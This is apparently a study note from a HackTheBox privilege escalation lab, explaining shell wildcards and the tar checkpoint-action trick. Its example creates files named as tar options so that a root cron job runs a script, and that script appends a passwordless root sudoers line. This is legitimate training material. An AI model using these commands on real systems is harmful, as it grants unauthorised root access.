6 - Wildcard Abuse

# Intro - Wildcard chars can be used as a replacement for other chars and are interpreted by the shell before other actions - Below are some examples of wildcard chars: |**Character**|**Significance**| |---|---| |`*`|An asterisk that can match any number of characters in a file name.| |`?`|Matches a single character.| |`[ ]`|Brackets enclose characters and can match any single one at the defined position.| |`~`|A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.| |`-`|A hyphen within brackets will denote a range of characters.| # Example Wildcard Abuse - If we look at the `man` page for `tar` command, we see that the `--checkpoint-action` option permits an `EXEC` action to be executed when a checkpoint is reached, i.e., run an arbitrary OS command once the `tar` command executes ![[images/Pasted image 20260203152130.png]] - By creating files with the below names names, when the wildcard is specified, the below files will be is passed to `tar` as command-line options: - `--checkpoint=1` - `--checkpoint-action=exec=sh root.sh` ```bash echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh echo "" > "--checkpoint-action=exec=sh root.sh" echo "" > --checkpoint=1 ls -la total 56 drwxrwxrwt 10 root root 4096 Aug 31 23:12 . drwxr-xr-x 24 root root 4096 Aug 31 02:24 .. -rw-r--r-- 1 root root 378 Aug 31 23:12 backup.tar.gz -rw-rw-r-- 1 htb-student htb-student 1 Aug 31 23:11 --checkpoint=1 -rw-rw-r-- 1 htb-student htb-student 1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh drwxrwxrwt 2 root root 4096 Aug 31 22:36 .font-unix drwxrwxrwt 2 root root 4096 Aug 31 22:36 .ICE-unix -rw-rw-r-- 1 htb-student htb-student 60 Aug 31 23:11 root.sh ``` - Let's tie it all together with a `cron job`, which is set up to back up the `/home/htb-student` directory's contents and create a compressed archive within `/home/htb-student` - Importantly, this `cron` job is set to run every minute, so it is a good candidate for privesc ```text # # mh dom mon dow command */01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz * ``` - Once the `cron` job runs, we can check to see if `htb-student` has `sudo` privs ```bassh sudo -l Matching Defaults entries for htb-student on NIX02: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User htb-student may run the following commands on NIX02: (root) NOPASSWD: ALL ```